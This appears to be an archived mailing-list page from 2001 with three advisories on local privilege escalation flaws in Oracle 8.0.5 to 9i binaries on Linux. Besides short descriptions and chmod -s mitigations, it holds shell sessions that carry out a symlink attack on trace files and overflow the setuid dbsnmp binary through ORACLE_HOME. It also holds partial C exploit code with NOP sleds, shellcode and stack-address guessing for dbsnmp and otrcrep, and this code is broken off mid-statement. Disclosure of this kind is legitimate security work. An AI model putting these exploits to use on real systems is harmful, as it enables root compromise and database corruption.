vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6

2001-08-02 Thread Juan Manuel Pascual Escriba


  System & Security Division

   Title: Vulnerability in oracle binary in Oracle 8.0.5

Date: 11-12-2000

Platform: Only tested in Linux, but can be "exported" to others.

  Impact: Any user compromise any file owned by oracle (DDBB owner).

  Author: Juan Manuel Pascual ([EMAIL PROTECTED])

  Status: Vendor Contacted at 18th July 2001

There is a write permision checking error in oracle binary  that can
be used by local users to write any file owned by oracle.

Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.

Chmod -s ;-.

Vendor was contacted .

This vulnerability was researched by:
Juan Manuel Pascual Escriba[EMAIL PROTECTED]

Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x3 pask pask 4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x3 pask pask 4096 dic 14 02:33 ..
-rw-r-1 oracle   pask   47 dic 14 02:35 ora_24028.trc

Ups a log owned by oracle with the structure ora_pid.trc 
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
until the log will be my link .. and i overwrite the binary. what about dbf files and 
go on 

Local Vulnerability in dbsnmp binary in Oracle 8.1.6 - 8.1.7 - 9i

2001-08-02 Thread Juan Manuel Pascual Escriba


  Systems & Security Division

Title:Local Vulnerability in dbsnmp binary

Date: 13-07-2001

Platform: Only tested in Linux but can be exported to others.

Impact:   Users belonging to oracle group can obtain euid=0

Author:   Juan Manuel Pascual Escriba <[EMAIL PROTECTED]>

Status:   Vendor contacted


Buffer overflow exists if ORACLE_HOME enviroment variable is defined
with a size greater than 749 bytes

[oracle@proves1 iAS]$ ls -alc
-rwsr-s---1 root oinstall   667874 jul 18 15:38

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 8.1.6]$
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 8.1.6]$[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl
-e 'print "A"x750'`
[oracle@proves1 8.1.6]$ dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Segmentation fault

This overflow exists in newer products like Oracle 9i and maybe in older

[oracle@proves1 iAS]$ ls -alc
-rwsr-s---1 root oinstall   971665 abr 11 17:41

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 iAS]$
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462

[oracle@proves1 iAS]$ Failed to initialize nl component,error=462
[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 iAS]$
Segmentation fault

Any user belonging to oracle group can obtain euid=0.

Chmod -s or if is posible (setresuid(getuid(),getuid(),getuid()) ...

I dont understand why is necesary root privileges to open ports >
1023 ?


Francisco Fernandez <[EMAIL PROTECTED]>
Ivan Sanchez
Mundo Alonso-Cuevillas       <[EMAIL PROTECTED]>

This vulnerability was researched by:
Juan Manuel Pascual Escriba[EMAIL PROTECTED]


" In God We trust, Others We monitor "

 Juan Manuel Pascual EscribáAdministrador de Sistemas
 PlazaSite S.A. c/ Tomás Bretón 32-38
 08950 Esplugues de Llobregat   (Barcelona),SPAIN
 Ph: +34 93 3717398   Fax: +34 93 3711968
 mob: 667591142 Email: [EMAIL PROTECTED]

/* Exploit code for dbsnmp binary in Oracle Linux Platform. I tested it in 
RH 6.2.

dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment variable. 
Its necessary to call setuid(0) before normal shellcode.

In My tests Offset may vary from 7846 to 7896. Its posible to obtain a normal 
(uid=oracle) shell for low offsets (incomplete setuid(0) jumps). 

"Cae fuego en lugar de mana
Se disfraza el asfalto de mar
El zapato no encuentra el pedal
Parece que anda suelto satanas."


This vulnerability was researched by:
Juan Manuel Pascual <[EMAIL PROTECTED]>

Special thanks to:

Ivan Sanchez <[EMAIL PROTECTED]>
Mundo Alonso-Cuevillas <[EMAIL PROTECTED]>


#define BUFFER  800
#define OFFSET 7896
#define NOP0x90
#define BINARY  "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp"

char shellcode[] =
"\x90"  /* Additional NOP */
"\x31\xc0"  /* begin setuid (0) */


unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");

void main(int argc, char *argv[]) {
  char *buff, *ptr,binary[12

vulnerability in otrcrep binary in Oracle 8.0.5.

2001-08-02 Thread Juan Manuel Pascual Escriba

  System & Security Division

   Title: Vulnerability in otrcrep in Oracle 8.0.5
Date: 14-12-2000
Platform: Only tested in Linux, but can be exported to others.
  Impact: Any user gain euid=oracle and egid=dba.
  Author: Juan Manuel Pascual ([EMAIL PROTECTED])
  Status: Vendor contacted at 18th July 2001

There is a buffer overflow in otrcrep binary that can be use by
local users to obtain euid of oracle user and egid to dba group.

Any user with local access, can gain euid= oracle and compromise the
integrity of DataBase.

Chmod -s.

Vendor was contacted .

This vulnerability was researched by:
Juan Manuel Pascual Escriba[EMAIL PROTECTED]

/* cc -o evolut otrcrep.c; ./evolut 300 0 */


#define BUFFER 300 
#define OFFSET 0 
#define NOP0x90
#define BINARY  "/home/oracle/app/oracle/product/8.0.5/bin/otrcrep a $EGG"
#define ORACLE_HOME "/home/oracle/app/oracle/product/8.0.5"

char shellcode[] =

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");

 /* void main(int argc, char *argv[]) { */
void main() {
  char *buff, *ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset=OFFSET;

  if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");

  addr = get_sp() -1420 -offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;


ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';